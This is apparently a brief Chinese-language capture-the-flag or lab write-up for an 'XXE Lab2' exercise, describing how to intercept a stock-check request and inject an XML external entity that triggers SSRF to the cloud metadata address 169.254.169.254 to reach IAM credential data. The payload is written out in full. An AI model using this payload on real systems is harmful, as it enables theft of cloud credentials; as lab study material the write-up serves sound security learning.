# XXE Lab2 這題 XXE + SSRF 的實戰題,目的就是透過 XXE 漏洞發 SSRF 請求到 EC2 metadata(模擬 AWS 內部機制)來偷取 IAM 資訊。。 一樣進入網站並攔截請求。 ![image](https://hackmd.io/_uploads/S1TEv47Hlx.png) ![image](https://hackmd.io/_uploads/Hy7dDE7Blx.png) 接著修改請求,我們進入題目給的 IP。 ``` <!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]> ``` ![image](https://hackmd.io/_uploads/H1okhVmHgx.png) 發現系統提示我們還有一層,所以我們繼續爬。 ![image](https://hackmd.io/_uploads/rkC2j4mSee.png) 爬到底就會出現我們要的東西。 ![image](https://hackmd.io/_uploads/H1GlT4XBgg.png) ---